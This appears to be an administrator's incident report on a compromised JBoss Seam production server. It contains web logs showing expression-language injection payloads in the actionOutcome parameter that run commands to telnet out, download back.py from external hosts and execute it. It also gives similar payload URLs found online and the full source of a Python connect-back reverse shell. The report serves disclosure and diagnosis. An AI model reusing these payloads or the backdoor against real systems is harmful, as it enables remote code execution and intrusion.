|
Recently discovered an exploit on our production server which appears to have allowed someone remote access to the user account set up for jboss.
I have not found anything to show this has been reported previously. I have not yet reproduced and am working on fully understanding the exploit.
== server.log ==
2012-05-22 13:53:10,198 36426506 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:10,198 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24
2012-05-22 13:53:16,595 36432903 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:16,595 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24
== httpd.log with pertinent sections grouped ==
/*
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 6677
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAcss/panel.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 561
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1" 200 1224
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/blueprint/screen.css HTTP/1.1" 200 4150
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/extranet.css HTTP/1.1" 200 10799
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/js/site.js HTTP/1.1" 200 539
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg.ajax4jsf.javascript.AjaxScript HTTP/1.1" 200 67842
*/
115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /*********/***/home.seam HTTP/1.1" 200 172555
115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /*********/***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979
/*
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /favicon.ico HTTP/1.1" 404 988
*/
115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:38 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979
/*
115.238.137.24 - - [22/May/2012:13:53:39 -0700] "GET /favicon.ico HTTP/1.1" 404 988
*/
115.238.137.24 - - [22/May/2012:13:53:43 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'python%20/tmp/back.py%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:44 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%407724369d&cid=1844 HTTP/1.1" 404 979
/*
115.238.137.24 - - [22/May/2012:13:53:45 -0700] "GET /favicon.ico HTTP/1.1" 404 988
*/
Discovered the following information on some searches
== http://erro.sinaapp.com/?p=47 ==
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6]}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’)}.getDeclaredMethods()[13]}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py’)}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘perl /tmp/back.py 118.122.176.42 53′)}
== back.py ==
#!/usr/bin/python
import sys
import os
import socket
import pty
shell = "/bin/sh"
def usage(programname):
print "Python connect-back door"
print "Usage: %s <conn_back_ip> <port>" % programname
def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit(1)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print "[+]Connect OK."
except:
print "[-]Can't connect"
sys.exit(2)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
pty.spawn(shell)
s.close()
if _name_ == "_main_":
main()
|
Major